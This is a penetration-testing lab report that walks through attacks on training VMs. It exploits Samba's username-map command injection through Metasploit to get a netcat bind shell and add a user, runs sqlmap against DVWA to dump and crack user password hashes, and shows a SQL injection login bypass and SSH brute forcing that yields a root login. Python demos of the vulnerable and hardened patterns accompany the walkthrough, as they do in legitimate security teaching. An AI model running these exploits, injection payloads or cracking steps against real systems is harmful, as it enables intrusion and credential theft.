Penetration Testing Lab Report
(Preview: 5 of 33 pages.)

Penetration testing training, 13 March, Day 1: summary of the main experiments

First a Struts2 vulnerability was used to execute arbitrary commands directly and take control of the host.

Lab environment: Kali Linux as the attack machine; OWASP BWA, 2003 and Metasploitable as targets, all confirmed reachable. Metasploit was then used to attack the target's Samba service and obtain a shell:

    search samba                        find the module
    use multi/samba/usermap_script      select the exploit module
    show payloads                       list the payloads compatible with this exploit
    set payload cmd/unix/bind_netcat    have netcat serve the shell once the exploit succeeds
    show options                        list the parameters that must be set
    set RHOST <target>                  set the target host
    exploit                             launch the attack

1. Install the VM software, start the Kali, OWASP and Metasploitable VMs and set up the environment so the hosts can reach each other; use NAT mode for the network, address range: ...

2. Start the Kali VM, become root and open msfconsole. Change the initial password to 123456:

    msf > passwd
    [*] exec: passwd
    Enter new UNIX password:
    Retype new UNIX password:
    passwd: password updated successfully

Then look for the Samba modules:

    msf > search samba

    Matching Modules
    Name                                              Disclosure Date  Rank       Description
    auxiliary/admin/smb/samba_symlink_traversal                        normal     Samba Symlink Directory Traversal
    auxiliary/dos/samba/lsa_addprivs_heap                              normal     Samba lsa_io_privilege_set Heap Overflow
    auxiliary/dos/samba/lsa_transnames_heap                            normal     Samba lsa_io_trans_names Heap Overflow
    auxiliary/dos/samba/read_nttrans_ea_list                           normal     Samba read_nttrans_ea_list Integer Overflow
    exploit/freebsd/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (*BSD x86)
    exploit/linux/samba/chain_reply                   2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
    exploit/linux/samba/lsa_transnames_heap           2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
    exploit/linux/samba/setinfopolicy_heap            2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
    exploit/linux/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Linux x86)
    exploit/multi/samba/nttrans                       2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
    exploit/multi/samba/usermap_script                2007-05-14       excellent  Samba "username map script" Command Execution
    exploit/osx/samba/lsa_transnames_heap             2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
    exploit/osx/samba/trans2open                      2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
    exploit/solaris/samba/lsa_transnames_heap         2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
    exploit/solaris/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
    exploit/unix/misc/distcc_exec                     2002-02-01       excellent  DistCC Daemon Command Execution
    exploit/unix/webapp/citrix_access_gateway_exec    2010-12-21       excellent  Citrix Access Gateway Command Execution
    exploit/windows/http/sambar6_search_results       2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
    exploit/windows/license/calicclnt_getconfig       2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
    post/linux/gather/enum_configs                                     normal     Linux Gather Configurations

The search is a keyword match, so Sambar and a few unrelated modules show up as well; the one for this target is exploit/multi/samba/usermap_script (rank excellent).

    msf > use multi/samba/usermap_script            select the exploit module
    msf exploit(usermap_script) > show payloads     list the payloads compatible with this exploit

    Compatible Payloads
    Name                                Rank    Description
    cmd/unix/bind_awk                   normal  Unix Command Shell, Bind TCP (via AWK)
    cmd/unix/bind_inetd                 normal  Unix Command Shell, Bind TCP (inetd)
    cmd/unix/bind_lua                   normal  Unix Command Shell, Bind TCP (via Lua)
    cmd/unix/bind_netcat                normal  Unix Command Shell, Bind TCP (via netcat)
    cmd/unix/bind_netcat_gaping         normal  Unix Command Shell, Bind TCP (via netcat -e)
    cmd/unix/bind_netcat_gaping_ipv6    normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
    cmd/unix/bind_perl                  normal  Unix Command Shell, Bind TCP (via Perl)
    cmd/unix/bind_perl_ipv6             normal  Unix Command Shell, Bind TCP (via perl) IPv6
    cmd/unix/bind_ruby                  normal  Unix Command Shell, Bind TCP (via Ruby)
    cmd/unix/bind_ruby_ipv6             normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
    cmd/unix/bind_zsh                   normal  Unix Command Shell, Bind TCP (via Zsh)
    cmd/unix/generic                    normal  Unix Command, Generic Command Execution
    cmd/unix/reverse                    normal  Unix Command Shell, Double Reverse TCP (telnet)
    cmd/unix/reverse_awk                normal  Unix Command Shell, Reverse TCP (via AWK)
    cmd/unix/reverse_lua                normal  Unix Command Shell, Reverse TCP (via Lua)
    cmd/unix/reverse_netcat             normal  Unix Command Shell, Reverse TCP (via netcat)
    cmd/unix/reverse_netcat_gaping      normal  Unix Command Shell, Reverse TCP (via netcat -e)
    cmd/unix/reverse_openssl            normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
    cmd/unix/reverse_perl               normal  Unix Command Shell, Reverse TCP (via Perl)
    cmd/unix/reverse_perl_ssl           normal  Unix Command Shell, Reverse TCP SSL (via perl)
    cmd/unix/reverse_php_ssl            normal  Unix Command Shell, Reverse TCP SSL (via php)
    cmd/unix/reverse_python             normal  Unix Command Shell, Reverse TCP (via Python)
    cmd/unix/reverse_python_ssl         normal  Unix Command Shell, Reverse TCP SSL (via python)
    cmd/unix/reverse_ruby               normal  Unix Command Shell, Reverse TCP (via Ruby)
    cmd/unix/reverse_ruby_ssl           normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
    cmd/unix/reverse_ssl_double_telnet  normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
    cmd/unix/reverse_zsh                normal  Unix Command Shell, Reverse TCP (via Zsh)

    msf exploit(usermap_script) > set payload cmd/unix/bind_netcat    have netcat serve the shell once the exploit succeeds
    payload => cmd/unix/bind_netcat
    msf exploit(usermap_script) > show options                        list the parameters that must be set
    msf exploit(usermap_script) > set RHOST xx.xx.xx.54               set the target host
    msf exploit(usermap_script) > exploit                             launch the attack

(Later the same day sqlmap/1.0-dev, the "automatic SQL injection and database takeover tool", was run with the cookie security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 to read the DVWA site's database users and passwords; its banner carries the usual legal disclaimer about use without prior mutual consent. See the sqlmap section below.)
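What the usermap_script module exploits, as background for the session output that follows: in Samba 3.0.x up to 3.0.25rc3 the "username map script" smb.conf option passed the client-supplied username to /bin/sh without escaping (CVE-2007-2447, the 2007-05-14 entry in the search results), so shell metacharacters in the username run as the Samba process's user; the netcat bind shell is simply the command the module smuggles in. The Python below is an added illustration of that bug class, not code from this report or from Metasploit: map_username_vulnerable stands in for a map script invoked through the shell with %u substituted into the command line, and map_username_hardened applies the two fixes (no shell, and an allow-list on the username). The usernames and the INJECTED marker are constructed for the example, and echo stands in for the script; nothing but echo is ever executed.

```python
import re
import subprocess

# Constructed inputs for the example: a normal username and one that smuggles a
# second shell command behind the user-controlled value (';' could equally be
# backticks or '$(...)'; the shell parses them all).
BENIGN_USER = "bob"
INJECTED_USER = "bob; echo INJECTED"

# Only characters that can legitimately appear in a mapped username.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def map_username_vulnerable(username: str) -> str:
    """Vulnerable pattern: the value is spliced into a command string that is
    handed to /bin/sh, which is what 'username map script = <script> %u'
    amounted to in the affected Samba versions. 'echo' stands in for the script."""
    command = f"echo {username}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def map_username_hardened(username: str) -> str:
    """Hardened pattern: reject anything outside the allow-list, then pass the
    value as one argv element so no shell ever parses it."""
    if not SAFE_USERNAME.match(username):
        raise ValueError(f"rejected username: {username!r}")
    result = subprocess.run(["echo", username], capture_output=True, text=True)
    return result.stdout.strip()


def demo() -> dict:
    """Run both variants on both inputs and return what each produced."""
    out = {
        "vulnerable_benign": map_username_vulnerable(BENIGN_USER),
        # The injected command runs: output has a second line 'INJECTED'.
        "vulnerable_injected": map_username_vulnerable(INJECTED_USER),
        "hardened_benign": map_username_hardened(BENIGN_USER),
    }
    try:
        map_username_hardened(INJECTED_USER)
        out["hardened_injected"] = "accepted"
    except ValueError:
        out["hardened_injected"] = "rejected"
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Even without the allow-list, the argv form alone would have printed the literal string "bob; echo INJECTED" instead of running anything; the allow-list is there so that a bad value is refused loudly rather than mapped to a nonsense account.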

Output of the exploit run:

    [*] Started bind handler
    [*] Command shell session 1 opened (xx.xx.xx.28:56558 -> xx.xx.xx.54:4444) at 2015-03-13 16:06:40 +0800

The box is now under our control; a user can be added:

    useradd test

The user was added successfully. (cmd/unix/bind_netcat makes the target listen, on port 4444 here, and the attacker connects in; if inbound connections to the target are filtered, use one of the reverse_* payloads, which call back to the attacker instead.)

Host discovery notes:
    -PU with -sn                                      UDP ping, host discovery only, no services listed
    -Pn                                               do not ping; treat the host as up
    nmap -sS -Pn xx.xx.xx.xx                          TCP SYN scan without ICMP, lists the services in detail
    nmap -P0 --script=smb-check-vulns xx.xx.xx.xx     look for MS08-067 (-P0 is the old spelling of -Pn)

nmap from msfconsole (msf > nmap runs the nmap binary):

    msf > nmap -sV -Pn xx.xx.xx.xx
    [*] exec: nmap -sV -Pn xx.xx.xx.xx
    ...
    MAC Address: 00:50:56:E7:1B:31 (VMware)
    Service detection performed. Please report any incorrect results at .../submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

    msf > nmap -P0 --script=smb-check-vulns xx.xx.xx.54
    Starting Nmap 6.46 at 2015-03-13 16:47 CST
    Host is up (0.00021s latency).
    All 1000 scanned ports on xx.xx.xx.54 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds

No script output: with every port filtered there is no SMB port (139/445) for smb-check-vulns to probe, so this run says nothing about MS08-067 either way.

    msf > nmap -O xx.xx.xx.32
    [*] exec: nmap -O xx.xx.xx.32
    Starting Nmap 6.46 at 2015-03-13 17:16 CST
    Nmap scan report for ... (xx.xx.xx.32)
    Host is up (0.0054s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
    No exact OS matches for host (test conditions non-ideal).
    OS detection performed. Please report any incorrect results at .../submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

With one open port and no closed one the fingerprint has too little to work on, hence the warning and the printer and phone guesses; treat them as noise, not as the target's operating system.
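The two nmap runs above show why a port's state matters beyond "open": with all 1000 ports filtered the SMB script has nothing to probe, and with one open port and no closed one nmap declines to trust its OS fingerprint. The Python below is an added example, not from the report, of the distinction a connect scan draws from the TCP reply (a completed handshake is open, an immediate RST, seen as ECONNREFUSED, is closed, and silence until the timeout is filtered) together with nmap's own rule for when OS detection is reliable. It scans loopback against a listener it opens itself, so it runs offline; real nmap also uses ICMP unreachables, retransmission and SYN-only probes, which this sketch omits.

```python
import errno
import socket
from typing import Dict, Iterable


def probe_port(host: str, port: int, timeout: float = 0.5) -> str:
    """Classify one TCP port the way a connect scan does:
    open     - the handshake completed (a SYN/ACK came back)
    closed   - the peer answered with RST (ECONNREFUSED)
    filtered - nothing came back before the timeout (dropped by a firewall)"""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            rc = s.connect_ex((host, port))
    except OSError:  # socket.timeout is an OSError subclass
        return "filtered"
    if rc == 0:
        return "open"
    if rc == errno.ECONNREFUSED:
        return "closed"
    return "filtered"


def scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, str]:
    """Probe each port in turn; nmap parallelises this, the logic is the same."""
    return {port: probe_port(host, port, timeout) for port in ports}


def os_scan_reliable(states: Dict[int, str]) -> bool:
    """nmap -O warns 'results may be unreliable' unless it saw at least one
    open and one closed port; the same rule applied to a scan result."""
    values = set(states.values())
    return "open" in values and "closed" in values


def local_listener() -> socket.socket:
    """An 'open' target: a listening socket on a free loopback port. No accept()
    is needed; the kernel completes the handshake into the backlog."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def unused_port() -> int:
    """A 'closed' target: bind to learn a free port number, then release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> dict:
    """Scan one open and one closed loopback port and report the states."""
    srv = local_listener()
    try:
        open_port = srv.getsockname()[1]
        closed_port = unused_port()
        states = scan("127.0.0.1", [open_port, closed_port])
        return {"open_port": open_port, "closed_port": closed_port,
                "states": states, "os_scan_reliable": os_scan_reliable(states)}
    finally:
        srv.close()


if __name__ == "__main__":
    print(demo())
```

The "filtered" branch cannot be produced on loopback, which is the point: a host that drops packets instead of answering with RST looks identical to a slow network, and that is exactly what makes the all-filtered scan above uninformative.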

Directory scan with Metasploit:

    msf > use auxiliary/scanner/http/dir_scanner
    msf auxiliary(dir_scanner) > set RHOSTS ...
    RHOSTS => ...
    msf auxiliary(dir_scanner) > run
    [*] Detecting error code
    [*] Detecting error code
    [*] Scanned 2 of 2 hosts (100% complete)
    [*] Auxiliary module execution completed

sqlmap: checking for SQL injection

    root@kali:~# sqlmap
    root@kali:~# sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"
    [*] starting at 11:50:20
    [11:50:20] [INFO] testing connection to the target URL
    [11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [11:50:21] [INFO] target URL is stable
    [11:50:21] [INFO] testing if GET parameter 'id' is dynamic
    [11:50:21] [INFO] confirming that GET parameter 'id' is dynamic
    [11:50:21] [INFO] GET parameter 'id' is dynamic
    [11:50:21] [INFO] heuristics detected web page charset 'ascii'
    [11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [11:50:21] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
    [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [11:50:25] [WARNING] reflective value(s) found and filtering out
    [11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL inline queries'
    [11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait
    [11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable

    [11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [11:50:36] [INFO] target URL appears to have 2 columns in query
    [11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 4334=4334 AND 'iasX'='iasX&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1 AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1 UNION ALL SELECT ...

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1 AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit
    ---
    [11:50:40] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    back-end DBMS: MySQL 5.0
    [11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xx.xx.xx.29'
    [*] shutting down at 11:50:40

Four techniques confirmed on one parameter; the error-based payload is the fastest to read data with, the time-based one the slowest and the only one that would still work if the page showed neither content differences nor errors.

Enumerate the databases, passing the DVWA session cookie (-p id limits testing to the parameter already found injectable):

    root@kali:~# sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs
    [11:53:32] [WARNING] reflective value(s) found and filtering out
    available databases [2]:
    [*] dvwa
    [*] information_schema

The cookie matters: security=low selects the unfiltered version of the page, and PHPSESSID must belong to a logged-in session, otherwise DVWA answers every request with a redirect to its login page and sqlmap tests the wrong response.

List the tables of the dvwa database:

    root@kali:~# sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables
    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

List the columns of users:

    root@kali:~# sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columns
    Database: dvwa
    Table: users
    [6 columns]
    +------------+-------------+
    | Column     | Type        |
    +------------+-------------+
    | user       | varchar(15) |
    | avatar     | varchar(70) |
    | first_name | varchar(15) |
    | last_name  | varchar(15) |
    | password   | varchar(32) |
    | user_id    | int(6)      |
    +------------+-------------+

Dump the user and password columns:

    root@kali:~# sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dump
    Database: dvwa
    Table: users
    [5 entries]
    +---------+--------------------------------------------+
    | user    | password                                   |
    +---------+--------------------------------------------+
    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
    | admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
    | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
    | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7           |
    | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99           |
    +---------+--------------------------------------------+

The dump shows that the user admin has the password admin: success.
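sqlmap prints a plaintext in parentheses after three of the dumped hashes because it recognises unsalted MD5 (32 hex digits in a varchar(32) column) and tries its built-in dictionary against it. The Python below is an added example, not from the report or from sqlmap, that repeats that step offline against all five dumped hashes. The wordlist is constructed for the example; the hashes are exactly those in the dump. Because there is no salt, one MD5 per candidate word is compared against every user at once, which is why unsalted fast hashes fall to a dictionary in milliseconds.

```python
import hashlib
from typing import Dict, Iterable, List, Optional

# user -> password hash, exactly as sqlmap dumped them from dvwa.users.
DUMPED_HASHES: Dict[str, str] = {
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "admin": "21232f297a57a5a743894a0e4a801fc3",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed wordlist for the example; a real run would read rockyou.txt or similar.
WORDLIST: List[str] = [
    "123456", "password", "admin", "letmein", "qwerty",
    "abc123", "charley", "owaspbwa",
]


def looks_like_md5(digest: str) -> bool:
    """Unsalted MD5 is 32 hex characters, which is why the column is varchar(32)."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack on unsalted MD5. Each candidate word is hashed once and
    looked up against every target, since equal passwords hash equally when
    there is no salt. Users whose hash is not in the wordlist stay None."""
    targets: Dict[str, List[str]] = {}
    for user, digest in hashes.items():
        targets.setdefault(digest.lower(), []).append(user)
    found: Dict[str, Optional[str]] = {user: None for user in hashes}
    for word in wordlist:
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        for user in targets.get(digest, []):
            found[user] = word
    return found


def main() -> None:
    assert all(looks_like_md5(h) for h in DUMPED_HASHES.values())
    for user, password in crack_md5(DUMPED_HASHES, WORDLIST).items():
        print(f"{user:8s} {DUMPED_HASHES[user]}  {password or '<not in wordlist>'}")


if __name__ == "__main__":
    main()
```

The defensive reading of the same table: a per-user salt would force one hash computation per user per word, and a slow hash (bcrypt, scrypt, Argon2) would make each of those cost milliseconds instead of microseconds.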

Day 2: information gathering

whois: domain registration lookup. netcraft: site information (hosting provider, site ranking, operating system). Side-site technique: if the main site is clean, look at the other websites on the same server; an IP2domain reverse lookup finds them.

1. Google hacking.
2. Directory structure: parent directory site:/XXXX (inc: site configuration, database credentials; bak: backup files; txt or sql: data structures, and so on). Or with Metasploit:
       use auxiliary/scanner/http/dir_scanner
       set THREADS 50      number of threads
       set RHOSTS XXXX     target
       run
   robots.txt tells search engines which directories are sensitive, and so tells us where to look.
3. Search for specific file types: site:XXXX filetype:xls
4. Search for pages likely to contain SQL injection: site:XXX inurl:login

On the login form, append a single quote to an arbitrary username. The database error it triggers reveals the shape of the query, for example

    select * from users where username='xx' and password='xx'

Entering admin' or 1=1-- as the username then turns it into

    select * from users where username='admin' or 1=1-- ' and password='...'

so the rest of the condition is commented out and the password can be anything. On an ordinary page, appending a quote to a parameter produces a database error if the parameter is injected into SQL, and leaves the page unchanged otherwise. Another way is to append and 1=1 and then and 1=2: if the page is unchanged for 1=1 but changes or errors for 1=2, the parameter is injectable; a'='a works the same way. Once admin' or 1=1-- gets you in, move to sqlmap:

    sqlmap -u "http://xx.xx.xx.29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    sqlmap -u <url> --cookie="<cookie>" -p id -D <database> -T <table>

Host discovery and port scanning

1. Live host scan:
       use auxiliary/scanner/discovery/arp_sweep
       set THREADS 50
       run
2. nmap service scanning and enumeration.
   (1) Metasploit's scanner auxiliary modules contain many service scanners and enumerators, usually named <service>_login; search name:version lists the version scanners.
   (2) SSH enumeration:
       use auxiliary/scanner/ssh/ssh_version
       set RHOSTS xxxx
       set THREADS 100
       run

SSH enumeration experiment:

    root@kali:~# msfconsole
    msf > use auxiliary/scanner/ssh/ssh_version
    msf auxiliary(ssh_version) > show options

    Module options (auxiliary/scanner/ssh/ssh_version):
       Name     Current Setting  Required  Description
       RHOSTS                    yes       The target address range or CIDR identifier
       RPORT    22               yes       The target port
       THREADS  1                yes       The number of concurrent threads
       TIMEOUT  30               yes       Timeout for the SSH probe

    msf auxiliary(ssh_version) > set RHOSTS ...
    msf auxiliary(ssh_version) > set THREADS 100
    set USERNAME root
    set PASS_FILE /aaa

(USERNAME and PASS_FILE are options of the ssh_login module used next, not of ssh_version, whose options are listed above.)
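The manual tests in the notes above (a stray quote, and 1=1 versus and 1=2, admin' or 1=1--) and sqlmap's boolean-based finding on DVWA all rest on one defect: the parameter is pasted into the SQL text. The Python below is an added example, not code from the report or from DVWA, that rebuilds dvwa.users in SQLite with constructed rows (the three dumped hashes, placeholder names), runs the login bypass and both detection tests against a concatenated query, and shows that all of them fail against the parameterised version. SQLite is used so it runs offline; the quote, the -- comment and or 1=1 behave the same in MySQL, except that MySQL requires a space after --, which the payload includes.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed stand-in for dvwa.users: the columns sqlmap listed, the dumped
# hashes, placeholder names (the real first/last names are not in the dump).
ROWS = [
    (1, "admin",   "admin",  "admin", "21232f297a57a5a743894a0e4a801fc3"),
    (2, "gordonb", "Gordon", "B",     "e99a18c428cb38d5f260853678922e03"),
    (3, "1337",    "Hack",   "Me",    "8d3533d75ae2c3966d7e0d4fcc69216b"),
]

Fetch = Callable[[str], List[Tuple]]  # a page: parameter value -> rows shown


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, "
                "last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> List[str]:
    """The query shape recovered from the error message: values are pasted in."""
    sql = f"SELECT user FROM users WHERE user='{username}' AND password='{password}'"
    return [row[0] for row in con.execute(sql)]


def login_parameterised(con: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Same query with bound parameters: quote and comment are just data."""
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    return [row[0] for row in con.execute(sql, (username, password))]


def sqli_page_vulnerable(con: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """DVWA's low-security sqli page: ?id= goes straight into the WHERE clause."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {id_param}"
    return list(con.execute(sql))


def sqli_page_hardened(con: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Validate the type, then bind: anything that is not an integer is refused."""
    try:
        user_id = int(id_param)
    except ValueError:
        return []
    return list(con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)))


def quote_check(fetch: Fetch, base: str) -> bool:
    """The stray-quote test: a database error means the input reached the parser."""
    try:
        fetch(base + "'")
    except sqlite3.Error:
        return True
    return False


def boolean_blind_check(fetch: Fetch, base: str) -> bool:
    """The 'and 1=1' / 'and 1=2' test (sqlmap's boolean-based blind): injectable
    when a true condition leaves the page unchanged and a false one alters it."""
    baseline = fetch(base)
    return fetch(f"{base} AND 1=1") == baseline and fetch(f"{base} AND 1=2") != baseline


if __name__ == "__main__":
    con = build_db()
    bypass = "admin' or 1=1-- "
    print("vulnerable login   :", login_vulnerable(con, bypass, "anything"))
    print("parameterised login:", login_parameterised(con, bypass, "anything"))
    for name, page in (("vulnerable", sqli_page_vulnerable), ("hardened", sqli_page_hardened)):
        fetch = lambda p, page=page: page(con, p)
        print(f"{name}: quote={quote_check(fetch, '1')} boolean={boolean_blind_check(fetch, '1')}")
```

The hardened page returns an empty result for "1 AND 1=1", so the boolean test reads it as not injectable; that is the correct verdict, not a false negative, because the condition never reached the database.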

    set THREADS 100
    run

Create the password file with vi.

Password sniffing: use auxiliary/sniffer/psnuffle

Password guessing experiment:

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options

    Module options (auxiliary/scanner/ssh/ssh_login):
       Name              Current Setting  Required  Description
       BLANK_PASSWORDS   false            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false            no        Add all passwords in the current database to the list
       DB_ALL_USERS      false            no        Add all users in the current database to the list
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             22               yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false            no        Try the username as the password for all users
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    msf auxiliary(ssh_login) > set USERNAME root
    USERNAME => root
    msf auxiliary(ssh_login) > set PASS_FILE /root/passwd      (a password file named passwd created in root's home directory)
    PASS_FILE => /root/passwd
    msf auxiliary(ssh_login) > set THREADS 50
    THREADS => 50
    msf auxiliary(ssh_login) > run
    [*] xx.xx.xx.29:22 SSH - Starting bruteforce
    [*] xx.xx.xx.29:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid'
    [-] xx.xx.xx.29:22 SSH - [1/3] - Failed: 'root':'ahbieid'
    [*] xx.xx.xx.29:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd'
    [-] xx.xx.xx.29:22 SSH - [2/3] - Failed: 'root':'xideoejd'
    [*] xx.xx.xx.29:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'
    [*] Command shell session 1 opened (xx.xx.xx.28:40157 -> xx.xx.xx.29:22) at 2015-03-14 13:51:30 +0800
    [+] xx.xx.xx.29:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux'
